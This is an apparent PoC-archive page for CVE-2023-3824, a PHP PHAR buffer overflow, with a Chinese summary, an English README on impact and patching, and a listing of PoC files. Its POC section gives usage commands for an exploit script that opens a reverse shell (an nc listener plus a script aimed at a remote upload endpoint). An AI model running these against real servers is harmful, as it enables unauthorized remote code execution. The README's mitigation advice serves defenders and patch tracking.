关联漏洞
标题:
PHP 缓冲区错误漏洞
(CVE-2023-3824)
描述:PHP是一种在服务器端执行的脚本语言。 PHP存在安全漏洞,该漏洞源于函数phar_dir_read()存在缓冲区溢出漏洞,该漏洞会导致内存损坏或远程代码执行(RCE)。受影响的产品和版本:PHP 8.0.30之前的8.0版本,8.1.22之前的8.1版本,8.2.8之前的8.2版本。
描述
In PHP version 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE.
介绍
# About
CVE-2023-3824 is a critical **remote code execution (RCE)** vulnerability in PHP, affecting versions 8.0.x (before 8.0.30), 8.1.x (before 8.1.22), and 8.2.x (before 8.2.8). The vulnerability arises from **insufficient length checking** when processing PHAR files (PHP's archive format), specifically when reading PHAR directory entries in the `Phar::loadPhar()` function.
## Exploitation Overview
- **Stack Buffer Overflow**: The vulnerability stems from improper bounds checking, which can lead to a **stack buffer overflow**. If an attacker crafts a malicious PHAR file with overly long filenames or directory entries, they can trigger this overflow.
- **Memory Corruption**: This overflow can cause memory corruption, which in turn may allow an attacker to execute arbitrary code on the server hosting the vulnerable PHP version.
- **Remote Code Execution**: Successful exploitation could grant the attacker the ability to execute arbitrary code remotely, effectively compromising the entire system.
## Exploit Example
The attack typically involves submitting a maliciously crafted PHAR file to a vulnerable PHP application. If the application processes untrusted PHAR files (e.g., through file uploads), an attacker could exploit this to run arbitrary code on the server.
A proof-of-concept (PoC) for this vulnerability shows how a carefully crafted PHAR file can trigger the overflow. While exploiting this vulnerability requires specific conditions (such as an application using PHAR files), the potential for RCE makes it a severe issue, especially for PHP-based web applications.
## Mitigation
- **Update PHP**: The primary fix is to update PHP to versions 8.0.30, 8.1.22, or 8.2.8, which include patches to address the vulnerability.
- **Avoid Untrusted PHAR Files**: As a general security measure, ensure your application avoids processing untrusted PHAR files.
This vulnerability has a high severity rating (CVSS 9.4) due to the potential for full system compromise. Keeping PHP updated is crucial to mitigate this risk.
# POC
Run reverse shell listener:
```bash
nc -l local_port
```
Then run POC:
```bash
bash cve-2023-3824.sh remote_url local_ip local_port
```
* _remote_url_ is vulnerable remote php script, e.g. `https://wp.example.com/form-uploader.php`
* _local_ip_ is an attacker machine IP
* _local_port_ is an attacker machine port
If the exploit succeeds, you'll get the shell with the server's (apache, nginx) permissions.
---
---
```text
.--,-``-.
,---, / / '.
,---, ,--.' | / ../ ;
,---.'| | | : \ ``\ .`- ' __ ,-.
| | : .--.--. : : : \___\/ \ :,' ,'/ /|
: : : ,--.--. ,---. / / ' : | |,--. \ : |' | |' |
: |,-. / \ / \ | : /`./ | : ' | / / / | | ,'
| : ' | .--. .-. | / / || : ;_ | | /' : \ \ \ ' : /
| | / : \__\/: . .. ' / | \ \ `.' : | | | ___ / : || | '
' : |: | ," .--.; |' ; /| `----. \ | ' | : / /\ / :; : |
| | '/ : / / ,. |' | / | / /`--' / : :_:,'/ ,,/ ',- .| , ;
| : |; : .' \ : |'--'. /| | ,' \ ''\ ; ---'
/ \ / | , .-./\ \ / `--'---' `--'' \ \ .'
`-'----' `--`---' `----' `--`-,,-'
```
---
inspired by ::PerfectForms::
文件快照
[4.0K] /data/pocs/0b128e35c13f0e30c0d4ed3eaa453197c22dc6ec
├── [1.2K] cve-2023-3824.sh
├── [ 192] generate.php
├── [ 0] injectee.php
├── [ 39K] payload.bin
└── [3.5K] README.md
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。